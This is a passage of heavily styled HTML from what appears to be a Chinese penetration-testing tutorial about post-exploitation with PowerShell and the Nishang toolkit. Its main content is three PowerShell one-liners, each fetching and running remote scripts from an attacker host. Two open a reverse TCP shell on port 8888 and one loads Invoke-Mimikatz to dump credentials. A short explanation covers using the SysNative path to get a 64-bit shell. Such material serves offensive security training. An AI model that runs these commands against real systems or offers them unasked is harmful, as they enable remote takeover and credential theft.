tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f803816196343-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">powershell</span>&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;http://10.101.101.16/nishang/Shells/Invoke-PowerShellTcp.ps1&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">PowerShellTcp</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">Reverse</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IPAddress</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">10.101.101.16</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">port</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">8888</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">这个时候如果你运行：</p><div id="crayon-5c25a60d4f809203272370" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 881.6px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f809203272370-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;http://10.101.101.16/nishang/Gather/Invoke-Mimikatz.ps1&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Mimikatz</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">系统会报错，原因是你不能在32位的&nbsp;Shell&nbsp;中运行64位的程程序，这里涉及到一个64位系统文件重定向的问题,所以正确的做法是使用下面的代码来反弹一个64位的&nbsp;PowerShell&nbsp;：</p><p><br/></p><div id="crayon-5c25a60d4f80e507019913" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><br/><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 1731.2px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f80e507019913-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">C</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//Windows//SysNative/WindowsPowerShell//v1.0//powershell.exe&nbsp;IEX&nbsp;(New-Object&nbsp;Net.WebClient).DownloadString(&#39;http://10.101.101.16/nishang/Shells/Invoke-PowerShellTcp.ps1&#39;);Invoke-PowerShellTcp&nbsp;-Reverse&nbsp;-IPAddress&nbsp;10.101.101.16&nbsp;-port&nbsp;8888</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; 